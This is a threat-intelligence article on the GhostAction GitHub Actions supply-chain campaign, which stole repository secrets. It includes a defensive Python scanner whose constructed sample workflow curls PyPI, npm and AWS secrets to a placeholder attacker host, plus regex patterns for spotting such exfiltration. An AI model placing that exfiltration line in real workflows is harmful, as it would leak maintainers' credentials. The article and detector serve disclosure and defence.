Cyber researchers have uncovered a large-scale software supply chain attack on GitHub dubbed “GhostAction”, which has exposed more than 3,300 secrets, including PyPI, npm, DockerHub, GitHub tokens, Cloudflare API keys, AWS access keys, and database credentials so far.

The campaign came to light after suspicious activity was detected in the FastUUID project on September 2.  Attackers had compromised maintainer accounts and injected a malicious GitHub Actions workflow designed to trigger on code pushes or manual dispatch.[1]

Once activated, the workflow harvested secrets from the environment and exfiltrated them via a curl POST request to an attacker-controlled server.  In FastUUID’s case, its PyPI token was stolen, though no malicious package uploads were made prior to the breach being contained.

[Figure: Malicious workflow run (Source: GitGuardian)]

Further investigation revealed that the incident was far more widespread than just FastUUID.  At least 817 repositories were found to contain similar malicious commits, all sending stolen secrets to the same endpoint.  To maximize the theft, attackers enumerated secret names from legitimate workflows, then hardcoded them into their own scripts.
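The two behaviours described above (a workflow that fires on push or manual dispatch and feeds a hardcoded list of `secrets.*` references into a curl POST to an outside host) are what a defender should look for in their own `.github/workflows/` files. The scanner below is an added example written for this article, not GitGuardian's or GitHub's tooling; the two workflow texts are constructed samples and `attacker.invalid` is a placeholder hostname.

```python
import re

# Constructed sample resembling the pattern described in the article: fires on push
# or workflow_dispatch, and pushes several repository secrets out with curl.
SUSPICIOUS_WORKFLOW = """\
name: Github Actions Security
on:
  push:
  workflow_dispatch:
jobs:
  process:
    runs-on: ubuntu-latest
    steps:
      - name: Collect
        run: |
          curl -X POST -d "pypi=${{ secrets.PYPI_API_TOKEN }}&npm=${{ secrets.NPM_TOKEN }}&aws=${{ secrets.AWS_SECRET_ACCESS_KEY }}" https://attacker.invalid/collect
"""

# Constructed benign workflow: one secret, consumed by a publishing action, no outbound curl.
BENIGN_WORKFLOW = """\
name: Publish
on:
  release:
    types: [published]
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: pypa/gh-action-pypi-publish@release/v1
        with:
          password: ${{ secrets.PYPI_API_TOKEN }}
"""

# ${{ secrets.NAME }} expressions anywhere in the file.
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
# A curl/wget command on one line that sends data or POSTs to an http(s) URL.
EXFIL_CMD = re.compile(r"\b(curl|wget)\b[^\n]*(-d\b|--data|-X\s*POST|--post-data)[^\n]*https?://", re.I)
# Triggers that let an attacker fire the job immediately after committing it.
EASY_TRIGGER = re.compile(r"^\s*(push|workflow_dispatch)\s*:", re.M)

def scan_workflow(text):
    """Return (flagged, secret_names, exfil_lines) for one workflow file's text."""
    secrets = sorted(set(SECRET_REF.findall(text)))
    exfil = [line.strip() for line in text.splitlines() if EXFIL_CMD.search(line)]
    # Flag when a secret expression sits on the same command line that ships data off-host;
    # the trigger check is reported for context rather than required for a hit.
    flagged = any(SECRET_REF.search(line) for line in exfil)
    return flagged, secrets, exfil

if __name__ == "__main__":
    for name, text in (("suspicious", SUSPICIOUS_WORKFLOW), ("benign", BENIGN_WORKFLOW)):
        flagged, secrets, exfil = scan_workflow(text)
        print(name, "flagged" if flagged else "clean", secrets, bool(EASY_TRIGGER.search(text)))
```

Run it over every file under `.github/workflows/` in each repository; a hit is a reason to rotate every secret the workflow names, since the article's point is that tokens stay usable until maintainers revoke them.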

By September 5, researchers had notified GitHub, npm, and PyPI and had filed issues in 573 affected repositories.  By that point, one hundred projects had already detected and reverted the malicious commits.  Soon after disclosure, the exfiltration endpoint was taken offline, but not before significant damage had occurred.

The exposure affects at least nine npm and 15 PyPI packages, leaving open the possibility of malicious releases unless maintainers revoke the compromised tokens.  While the campaign shares similarities with the AI-powered ‘s1ngularity’ attack on over 2,100 GitHub accounts in August, researchers believe GhostAction is a separate operation altogether.

This article is shared with permission at no charge for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC).  For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com    

Weekly Cyber Intelligence Briefings:

REDSHORTS - Weekly Cyber Intelligence Briefings

https://register.gotowebinar.com/register/5207428251321676122

[1] https://www.sentinelone.com/blog/the-good-the-bad-and-the-ugly-in-cybersecurity-week-37-6/
